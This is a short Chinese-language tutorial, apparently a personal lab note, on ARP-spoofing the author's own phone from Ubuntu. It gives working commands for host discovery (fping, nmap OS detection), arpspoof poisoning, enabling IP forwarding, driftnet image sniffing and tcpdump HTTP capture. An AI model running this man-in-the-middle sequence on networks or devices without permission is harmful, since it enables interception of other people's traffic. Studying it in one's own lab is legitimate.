局域网ARP欺骗
使用Ubuntu与我的手机做实验, 欺骗路由器将回应手机的信息发到Ubuntu中去, 再进行抓包分析等,主要用于开发.
1.发现目标IP
可使用arp-scan -l
或fpring(高级版ping)
如下使用fpring, 基本用法: fping批量扫描主机
fping -g -r 0 -s 192.168.0.0/24
结果得到5个状态为active, 去掉网关与Ubuntu的IP, 手机的IP为剩下的3个中的一个:
2.系统检测
使用NMap,也就是Network Mapper,是Linux下的网络扫描和嗅探工具包;基本用法:nmap命令—–基础用法.
如果需要下载最新版的,到Downloading Nmap中下载一个rpm包放到Ubuntu中,并不进行检测依赖关系的情况下进行安装rpm -ivh --nodeps nmap-7.70-1.x86_64.rpm
;也可以直接apt install nmap
.
对3个IP进行系统检测:
nmap -T4 -O 192.168.0.107 192.168.0.115 192.168.0.103
当3个都检测成功时(3 hosts up), 执行结果如下:
当hosts up不完整的时候,重新执行检测命令再次检测,直至成功.由大概可知我的手机局域网的IP为192.168.0.103
3.ARP欺骗
安装linux 嗅探工具 dsniff: apt install dsniff
dsniff的基本用法: dsniff 和 Ettercap 和 bettercap 详解 - 网络嗅探工具包
双向欺骗:
arpspoof -i ens33 -t 192.168.0.103 192.168.0.1
arpspoof -i ens33 -t 192.168.0.1 192.168.0.103
在开启了端口转发, 我的手机也无法上网,此时双向不成功,应使用单向欺骗,只令Ubuntu冒充网关:
arpspoof -i ens33 -t 192.168.0.103 192.168.0.1
4.开启端口转发
在不开启端口转发的时候,ARP欺骗只会令手机无法上网;此时应开启端口转发,使手机可以访问外网,如下:
echo 1 > /proc/sys/net/ipv4/ip_forward
5.图片嗅探
apt install driftnet
driftnet
6.抓HTTP包
tcpdump -i ens33 tcp[20:2]=0x4745 or tcp[20:2]=0x4854 -A and dst host 192.168.0.103